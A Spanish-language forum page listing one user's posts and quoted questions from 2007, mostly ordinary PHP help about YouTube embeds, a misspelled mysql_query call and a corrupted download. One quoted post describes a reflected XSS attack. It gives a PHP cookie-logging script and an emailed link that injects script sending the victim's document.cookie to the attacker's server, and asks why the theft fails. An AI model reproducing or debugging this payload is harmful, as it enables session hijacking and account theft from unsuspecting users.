Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: alone-in-the-chat en 29 Noviembre 2007, 22:32 PM
Yo necesito alguien que me configure un yahoo store a base de purito Rtml
Ya que esta de moda pedir las cosas
Cita de: Hate en 29 Noviembre 2007, 17:31 PM
me lo puedes explicar un poco?
Gracias
Mi lenguaje es php
Cita de: Hate en 29 Noviembre 2007, 16:51 PM
Buenas mi problema es que quiero insertar videos de youtube en mi web pero como son muchos los videos tengo una base de datos y inserta la url dentro del reproductor de youtube, bueno el codigo es algo asi
<object width='425' height='355'>
<param name='movie' value='" . $row['video'] . "&rel=0&color1=0x006699&color2=0x54abd6&border=0'>
</param>
<param name='wmode' value='transparent'>
</param>
</object>
La base de datos va perfecto el problema es que el video no se ve y viendo el codigo fuente de la web veo que al verla desde el navegador en los & pone & y no sale el video, alguien sabe como puedo evitar ese &?
Cita de: magarcan en 28 Noviembre 2007, 12:56 PM
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS
Adjuntos:
Mi script PHP<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>
Lo que pongo en el hipervínculo:http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
if ($variable) {//esto puede ser un botón, whatever...
echo "muestras el código";
}
CitarFatal error: Call to undefined function myssql_query() in J:\webserver\guestbook.php on line 16
Cita de: chicuela66 en 22 Noviembre 2007, 10:41 AM
No da ningún error, hace la descarga pero al abrir el fichero sale como dañado o corrupto.